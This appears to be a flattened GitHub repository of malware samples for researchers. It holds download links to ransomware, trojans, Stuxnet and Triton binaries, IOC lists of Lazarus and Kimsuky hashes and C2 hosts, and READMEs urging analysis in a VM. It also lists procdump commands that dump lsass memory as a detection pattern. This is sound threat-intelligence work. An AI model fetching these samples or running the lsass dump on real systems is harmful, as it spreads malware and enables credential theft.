/GreenbugAPT/Greenbug.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreenbugAPT/Greenbug.bin -------------------------------------------------------------------------------- /GreenbugAPT/GreenbugAPTx64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreenbugAPT/GreenbugAPTx64.bin -------------------------------------------------------------------------------- /GreenbugAPT/GreenbugInfo.txt: -------------------------------------------------------------------------------- 1 | https://www.scmagazine.com/home/security-news/apts-cyberespionage/researchers-tentatively-link-greenbug-cyberspy-group-to-saudi-shamoon-attackers/ 2 | -------------------------------------------------------------------------------- /GreenbugAPT/ISMDoorx64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreenbugAPT/ISMDoorx64.bin -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergyDropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergyDropper.bin -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergyDropper.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergyDropper.doc -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergyDropper2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergyDropper2.bin -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergyImplant2018.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergyImplant2018.bin -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergymini.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergymini.bin -------------------------------------------------------------------------------- /Hancitor/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /Hancitor/【CVE-2017-11882】-b3d345b26d3fb6e05f1ad38668a649f9: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Hancitor/【CVE-2017-11882】-b3d345b26d3fb6e05f1ad38668a649f9 -------------------------------------------------------------------------------- /Lazarus IOC (20231027): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #https://securelist.com/unveiling-lazarus-new-campaign/110888/ 3 | 4 | #MD5 5 | 9cd90dff2d9d56654dbecdcd409e1ef3 6 | 88a96f8730b35c7406d57f23bbba734d 7 | 54df2984e833ba2854de670cce43b823 8 | Ae00b0f490b122ebab614d98bb2361f7 9 | e6fa116ef2705ecf9677021e5e2f691e 10 | 31af3e7fff79bc48a99b8679ea74b589 11 | 9b62352851c9f82157d1d7fcafeb49d3 12 | 3a77b5054c36e6812f07366fb70b007d 13 | E89fa6345d06da32f9c8786b65111928 14 | 15 | #C2 16 | ictm.or.]kr 17 | samwoosystem.co.]kr 18 | theorigin.co.]kr 19 | ucware.]net 20 | friendmc.]com 21 | hankooktop.]com 22 | khmcpharm.]com 23 | vietjetairkorea.]com 24 | yoohannet.]kr 25 | admin.esangedu.]kr 26 | api.shw.]kr 27 | hicar.kalo.]kr 28 | hspje.]com 29 | kscmfs.or.]kr 30 | kstr.radiology.or.]kr 31 | little-pet.]com 32 | mainbiz.or.]kr 33 | new-q-cells.]com 34 | pediatrics.or.]kr 35 | pms.nninc.co.]kr 36 | safemotors.co.]kr 37 | swt-keystonevalve.]com 38 | vnfmal2022.]com 39 | warevalley.]com 40 | blastedlevels.]com 41 | droof.]kr 42 | friendmc.]com 43 | hanlasangjo.]com 44 | healthpro.or.]kr 45 | medric.or.]kr 46 | muijae.]com 47 | nonstopexpress.]com 48 | seoulanesthesia.or.]kr 49 | siriuskorea.co.]kr 50 | yoohannet.]kr 51 | -------------------------------------------------------------------------------- /Lazarus IOC (20231101): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn 3 | 4 | 3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb59940 5 | 2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1 6 | 927b3564c1cf884d2a05e1d7bd24362ce8563a1e9b85be776190ab7f8af192f6 7 | 8 | #Domain 9 | tp-globa[.xyz 10 | 11 | #C2 12 | 192.119.64[.43 13 | 23.254.226[.90 14 | -------------------------------------------------------------------------------- /Lazarus IOC (20231108): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/ 3 | 4 | #C2 Domain 5 | swissborg[.]blog 6 | 7 | #HASH 8 | 8bfa4fe0534c0062393b6a2597c3491f7df3bf2eabfe06544c53bdf1f38db6d4 9 | 15d53bb839e00405a34a8b690ec181f5555fc4f891b8248ae7fa72bad28315a9 10 | f1713afaf5958bdf3e975ebbab8245a98a84e03f8ce52175ef1568de208116e0 11 | b8c751694945bff749b6a0cd71e465747402cfd25b18dc233c336e417b3e1525 12 | c704bd5c5cdc8d65ada8cf8c5c4a0f02e346de84d2a317443ae3eed796673f59 13 | 5b397f36a764f210c1cbd249c3370e9f5bab1d66dc5d9b433f666ac67b4d3e7e 14 | -------------------------------------------------------------------------------- /Lazarus IOC(20240511): -------------------------------------------------------------------------------- 1 | #Tags Kimsuky 2 | 3 | #Description 4 | https://www.genians.co.kr/blog/threat_intelligence/facebook 5 | 6 | #IP 7 | 5.9.123.217 8 | 52.177.14.24 9 | 69.163.180.70 10 | 162.0.209.27 11 | 162.0.209.91 12 | 13 | #Domain 14 | brandwizer.co.in 15 | makeoversalon.net.in 16 | rfa.ink 17 | yonsei.lol 18 | mitmail.tech 19 | joongang.site 20 | beastmodser.club 21 | worldinfocontact.club 22 | ielsems.com 23 | dusieme.com 24 | rapportdown.lol 25 | nuclearpolicy101.org 26 | 27 | #Hash 28 | 433655572c0f319e576a451d069a29966f9d6b409207a649f286ab34d1c8cfeb 29 | ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf 30 | 2f7f3a86a868f6c5a85fb12fe028fd254cd9622075b179923187461c72d6aea0 31 | 2209f27b08fc10118ef03ca983f1bbdff3ca2371a02382f9f34f64fdcae07ffe 32 | 9c6f6db86b5ccdda884369c9c52dd8568733e126e6fe9c2350707bb6d59744a1 33 | 3140153c3f3e8663496797795992a10089d966a74637846717b9459d3982b1f8 34 | -------------------------------------------------------------------------------- /Lazarus(20231124).xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus(20231124).xlsx -------------------------------------------------------------------------------- /Lazarus(20231127): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #https://asec.ahnlab.com/en/59318/ 3 | 4 | #sha256 5 | 9f90670d2197496f7d9d20152fe822238d9806716baf55c0078eef937dc8dfdb 6 | 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4 7 | c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7 8 | 0112b5d175f5b5905a744c69bf263e78f317913b9e1b28b684f7e0036cc46584 9 | dd13cf13c1fbdc76da63e76adcf36727cfe594e60af0dc823c5a509a13ae1e15 10 | bc024b4bca0d444ca12e42e1a69215422592c5821c0b2e2dfa51a31b7482e2e4 11 | 25a3b5e8f07befa6809d000cf0e41929a2ff8a0c3b05fd54b03585e691713303 12 | 58cbe4315620fa8c46317d57e20aa56b1f757699ec794cb79e9cbf87e828d566 13 | 14 | #C2 15 | 27.102.114.215 16 | 137.175.17.221 17 | 137.175.17.172 18 | 176.105.255.60 19 | -------------------------------------------------------------------------------- /Lazarus/BlueNoroff_INK.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/BlueNoroff_INK.zip -------------------------------------------------------------------------------- /Lazarus/DangerousPassword.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/DangerousPassword.pdf -------------------------------------------------------------------------------- /Lazarus/LazarusMacOS.bin.xltd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/LazarusMacOS.bin.xltd -------------------------------------------------------------------------------- /Lazarus/LazarusMacOS.bin.xltd.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/LazarusMacOS.bin.xltd.cfg -------------------------------------------------------------------------------- /Lazarus/RyukRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/RyukRansomware.bin -------------------------------------------------------------------------------- /Lazarus/elfLazarus.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/elfLazarus.bin -------------------------------------------------------------------------------- /Lazarus_IOC(20240424): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #Description https://www.reddit.com/r/hacking/comments/18npzcl/obfuscated_code_a_recruiter_sent_me/?rdt=64366 3 | #Description https://twitter.com/dimitribest/status/1782609281897902426 4 | 5 | #C2 6 | 173.211.106.101 7 | 45.61.160.14:1224 8 | 147.124.213.17:1244 9 | 147.124.212.89:1224 10 | 147.124.214.237:1244 11 | 147.124.214.129 12 | 147.124.214.131 13 | 147.124.212.146 14 | 45.61.169.99:3000 15 | 67.203.7.171:1244 16 | 167.88.168.152:1224 17 | 67.203.7[.]245 18 | 19 | #Hash 20 | 39785213364b84c1442d133c778bf5472d76d8ef13b58b32b8dd8ac0201c82ca 21 | 6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0 22 | 45c991529a421104f2edf03d92e01d95774bf54325f9107dd4139505912a0c1e 23 | a229e8df494cd747832f7884b9265771ed9d8b45d8efa9df5181e8f8fc69db9d 24 | f790ad0bfe7a465805b44264c88588e70eb3200806ac290150205a57d28d6b1a 25 | -------------------------------------------------------------------------------- /Lazarus_IOC(20240528): -------------------------------------------------------------------------------- 1 | #Tags Lazarus, Moonstone Sleet 2 | 3 | #Description 4 | https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ 5 | 6 | #SHA-256 7 | f59035192098e44b86c4648a0de4078edbe80352260276f4755d15d354f5fc58 8 | cb97ec024c04150ad419d1af2d1eb66b5c48ab5f345409d9d791db574981a3fb 9 | 39d7407e76080ec5d838c8ebca5182f3ac4a5f416ff7bda9cbc4efffd78b4ff5 10 | 70c5b64589277ace59db86d19d846a9236214b48aacabbaf880f2b6355ab5260 11 | cafaa7bc3277711509dc0800ed53b82f645e86c195e85fbf34430bbc75c39c24 12 | 9863173e0a45318f776e36b1a8529380362af8f3e73a2b4875e30d31ad7bd3c1 13 | f66122a3e1eaa7dcb7c13838037573dace4e5a1c474a23006417274c0c8608be 14 | 56554117d96d12bd3504ebef2a8f28e790dd1fe583c33ad58ccbf614313ead8c 15 | ecce739b556f26de07adbfc660a958ba2dca432f70a8c4dd01466141a6551146 16 | 09d152aa2b6261e3b0a1d1c19fa8032f215932186829cfcca954cc5e84a6cc38 17 | 18 | #Domain 19 | bestonlinefilmstudio.org 20 | blockchain-newtech.com 21 | ccwaterfall.com 22 | chaingrown.com 23 | defitankzone.com 24 | detankwar.com 25 | freenet-zhilly.org 26 | matrixane.com 27 | pointdnt.com 28 | starglowventures.com 29 | mingeloem.com 30 | 31 | #Monitor Procudump Suspicious execution 32 | procdump -ma lsass.exe 33 | procdump -ma -accepteula lsass.exe 34 | -------------------------------------------------------------------------------- /MiddleEastMalware/AndroidMalware.bin.xltd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MiddleEastMalware/AndroidMalware.bin.xltd -------------------------------------------------------------------------------- /MiddleEastMalware/AndroidMalware.bin.xltd.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MiddleEastMalware/AndroidMalware.bin.xltd.cfg -------------------------------------------------------------------------------- /MiddleEastMalware/EgyptianPDF.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MiddleEastMalware/EgyptianPDF.bin -------------------------------------------------------------------------------- /MuddyWaterAPT/Cv.doc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MuddyWaterAPT/Cv.doc.bin -------------------------------------------------------------------------------- /MuddyWaterAPT/MuddyWaterAPTInformation.txt: -------------------------------------------------------------------------------- 1 | https://securelist.com/muddywater/88059/ 2 | -------------------------------------------------------------------------------- /MuddyWaterAPT/shakva-lb.doc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MuddyWaterAPT/shakva-lb.doc.bin -------------------------------------------------------------------------------- /MuddyWaterAPT/【CVE-2017-0199】-b41e0c8a2ce8e9de32b9f62b7c3ca047.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MuddyWaterAPT/【CVE-2017-0199】-b41e0c8a2ce8e9de32b9f62b7c3ca047.docx -------------------------------------------------------------------------------- /OlympicDestroyer/OlympicDestroyer.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/OlympicDestroyer/OlympicDestroyer.bin -------------------------------------------------------------------------------- /OlympicDestroyer/OlympicDestroyerAtos.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/OlympicDestroyer/OlympicDestroyerAtos.bin -------------------------------------------------------------------------------- /OlympicDestroyer/OlympicSystemStealer.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/OlympicDestroyer/OlympicSystemStealer.bin -------------------------------------------------------------------------------- /OlympicDestroyer/OlympicsSouthKorea.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/OlympicDestroyer/OlympicsSouthKorea.bin -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### About 2 | 3 | Malware samples used by some APT groups (Lazarus, APT28, APT29, APT32, Emotet...) are published here for analysis and use by other security researchers/malware analysts **:smile:** 4 | 5 | ## malware-traffic 6 | 7 | The [malware-traffic-analysis](https://malware-traffic-analysis.net/2022/06/27/index.html) site contains PCAPs and IOCs of various Malware Samples 8 | 9 | ## Report 10 | 11 | - [BlueNoroff](https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/) 12 | 13 | ## Sandbox 14 | 15 | - [VT](https://www.virustotal.com/) 16 | - [any](https://any.run/) 17 | - [joe](https://www.joesandbox.com/#windows) 18 | - [threatbook](https://x.threatbook.com/) 19 | 20 | ## Tools 21 | - [Wireshark](https://www.wireshark.org/download.html) 22 | - [Hsword](https://www.52pojie.cn/thread-1358235-1-1.html) 23 | 24 | ### Tips 25 | 26 | Download and run in a virtual machine or sandbox 27 | -------------------------------------------------------------------------------- /Ransomeware/DharmaRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/DharmaRansomware.bin -------------------------------------------------------------------------------- /Ransomeware/DistrictRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/DistrictRansomware.bin -------------------------------------------------------------------------------- /Ransomeware/FoxRansomware.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/FoxRansomware.zip -------------------------------------------------------------------------------- /Ransomeware/KatyushaRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/KatyushaRansomware.bin -------------------------------------------------------------------------------- /Ransomeware/KrakenCryptor2.0.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/KrakenCryptor2.0.bin -------------------------------------------------------------------------------- /Ransomeware/MINOTAURransomware.false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/MINOTAURransomware.false -------------------------------------------------------------------------------- /Ransomeware/MatrixRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/MatrixRansomware.bin -------------------------------------------------------------------------------- /Ransomeware/NotPetya.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/NotPetya.bin -------------------------------------------------------------------------------- /Ransomeware/README: -------------------------------------------------------------------------------- 1 | 0xffff0800 Malware Sample Library Dedicated Server 2 | 3 | ----------------------------------------------------- 4 | 5 | Welcome to my malware sample library server. 6 | I post all my favourite Malware samples here for other security researchers/malware analyst's to analyze and play with. 7 | 8 | **DO NOT RUN SAMPLES ON YOUR OWN BOX!!! USE A VIRTUAL MACHINE!** 9 | 10 | For more information on each of the samples use Virustotal,Hybrid Analysis,and or on any other Threat Intelligence Platform. 11 | 12 | ----------------------------------------------------- 13 | http://twitter.com/0xffff0800 14 | Jabber: 0xffff0800@exploit.im 15 | 0xffff0800 Contact: 0xffff0800@protonmail.com 16 | 17 | -------------------------------------------------------------------------------- /Ransomeware/WannaCry.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/WannaCry.exe -------------------------------------------------------------------------------- /Ransomeware/WannaCry2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/WannaCry2.exe -------------------------------------------------------------------------------- /Ransomeware/WannaCryDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/WannaCryDLL.bin -------------------------------------------------------------------------------- /Ransomeware/__README__.txt: -------------------------------------------------------------------------------- 1 | 0xffff0800 Malware Sample Library Dedicated Server 2 | 3 | ----------------------------------------------------- 4 | 5 | Welcome to my malware sample library server. 6 | I post all my favourite Malware samples here for other security researchers/malware analyst's to analyze and play with. 7 | 8 | **DO NOT RUN SAMPLES ON YOUR OWN BOX!!! USE A VIRTUAL MACHINE!** 9 | 10 | For more information on each of the samples use Virustotal,Hybrid Analysis,and or on any other Threat Intelligence Platform. 11 | 12 | ----------------------------------------------------- 13 | http://twitter.com/0xffff0800 14 | Jabber: 0xffff0800@exploit.im 15 | 0xffff0800 Contact: 0xffff0800@protonmail.com 16 | 17 | -------------------------------------------------------------------------------- /Ransomeware/mcrypt.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/mcrypt.bin -------------------------------------------------------------------------------- /Ransomeware/samsamRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/samsamRansomware.bin -------------------------------------------------------------------------------- /Remcos RAT.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Remcos RAT.zip -------------------------------------------------------------------------------- /SLINGSHOT/SlingShot.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SLINGSHOT/SlingShot.bin -------------------------------------------------------------------------------- /SilverTerrier/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /SilverTerrier/【CVE-2017-11882】-4972fac34f773668a523ef51b4898387: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SilverTerrier/【CVE-2017-11882】-4972fac34f773668a523ef51b4898387 -------------------------------------------------------------------------------- /SilverTerrier/【CVE-2017-11882】-4a84e57f0b3e7868cea1904cce9c1c7e: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SilverTerrier/【CVE-2017-11882】-4a84e57f0b3e7868cea1904cce9c1c7e -------------------------------------------------------------------------------- /SilverTerrier/【CVE-2017-11882】-62523aaf31e6d489bdca6d74d19a1927: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SilverTerrier/【CVE-2017-11882】-62523aaf31e6d489bdca6d74d19a1927 -------------------------------------------------------------------------------- /SilverTerrier/【CVE-2017-11882】-dd0802b2a4c476917099862193e7ab08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SilverTerrier/【CVE-2017-11882】-dd0802b2a4c476917099862193e7ab08 -------------------------------------------------------------------------------- /Stuxnet Malware/A0055521.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/A0055521.sys -------------------------------------------------------------------------------- /Stuxnet Malware/Copy of Shortcut to.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/Copy of Shortcut to.lnk -------------------------------------------------------------------------------- /Stuxnet Malware/KRvW5H2T.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Index of /Library/Stuxnet Malware/signed drivers 5 | 6 | 7 |

Index of /Library/Stuxnet Malware/signed drivers

8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
[ICO]NameLast modifiedSizeDescription
[PARENTDIR]Parent Directory  -  
[ ]0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c7091982018-10-06 01:19 17K 
[ ]63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b328022018-10-06 01:19 25K 
[ ]70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b2018-10-06 01:19 25K 
[ ]1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c2018-10-06 01:19 26K 
18 |
Apache/2.4.34 (Ubuntu) Server at iec56w4ibovnb4wc.onion Port 80
19 | 20 | -------------------------------------------------------------------------------- /Stuxnet Malware/index (1).html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Index of /Library/Stuxnet Malware/stuxnet core 5 | 6 | 7 |

Index of /Library/Stuxnet Malware/stuxnet core

8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
[ICO]NameLast modifiedSizeDescription
[PARENTDIR]Parent Directory  -  
[ ]dropper.exe_2018-10-06 01:19 506K 
[ ]dropper.id02018-10-06 01:19 112K 
[ ]dropper.id12018-10-06 01:19 2.0M 
[ ]dropper.id22018-10-06 01:19 2.6K 
[ ]dropper.nam2018-10-06 01:19 16K 
[ ]dropper.til2018-10-06 01:19 290  
[ ]maindll.decrypted.unpacked.dll_2018-10-06 01:19 1.2M 
21 |
Apache/2.4.34 (Ubuntu) Server at iec56w4ibovnb4wc.onion.si Port 80
22 | 23 | -------------------------------------------------------------------------------- /Stuxnet Malware/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Index of /Library/Stuxnet Malware/signed drivers 5 | 6 | 7 |

Index of /Library/Stuxnet Malware/signed drivers

8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
[ICO]NameLast modifiedSizeDescription
[PARENTDIR]Parent Directory  -  
[ ]0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c7091982018-10-06 01:19 17K 
[ ]63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b328022018-10-06 01:19 25K 
[ ]70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b2018-10-06 01:19 25K 
[ ]1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c2018-10-06 01:19 26K 
18 |
Apache/2.4.34 (Ubuntu) Server at iec56w4ibovnb4wc.onion.si Port 80
19 | 20 | -------------------------------------------------------------------------------- /Stuxnet Malware/malware.ex_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/malware.ex_ -------------------------------------------------------------------------------- /Stuxnet Malware/~WTR4132.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/~WTR4132.tmp -------------------------------------------------------------------------------- /Stuxnet Malware/~WTR4141.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/~WTR4141.tmp -------------------------------------------------------------------------------- /Triton/TRISIS-TRITON-HATMAN-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Triton/TRISIS-TRITON-HATMAN-master.zip -------------------------------------------------------------------------------- /Triton/TritonCRC.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Triton/TritonCRC.bin -------------------------------------------------------------------------------- /Trojans/FormbookStealer.false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/FormbookStealer.false -------------------------------------------------------------------------------- /Trojans/GlLgNm3t.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Index of /Library/Trojans/Azorult 5 | 6 | 7 |

Index of /Library/Trojans/Azorult

8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
[ICO]NameLast modifiedSizeDescription
[PARENTDIR]Parent Directory  -  
[ ]AzorultDownloaderCVE-2017-11882.xml2018-10-16 22:36 9.3K 
[ ]AzorultPasswordStealer.bin2018-10-16 22:37 203K 
16 |
Apache/2.4.34 (Ubuntu) Server at iec56w4ibovnb4wc.onion Port 80
17 | 18 | -------------------------------------------------------------------------------- /Trojans/NanocoreRAT.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/NanocoreRAT.bin -------------------------------------------------------------------------------- /Trojans/PasswordStealer.NET.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/PasswordStealer.NET.bin -------------------------------------------------------------------------------- /Trojans/Razylokibot.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/Razylokibot.bin -------------------------------------------------------------------------------- /Trojans/Trickbotpwgrab.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/Trickbotpwgrab.bin -------------------------------------------------------------------------------- /Turla/CarbonImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/CarbonImplant.bin -------------------------------------------------------------------------------- /Turla/KazuarRAT.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/KazuarRAT.bin -------------------------------------------------------------------------------- /Turla/NCSC.bin: -------------------------------------------------------------------------------- 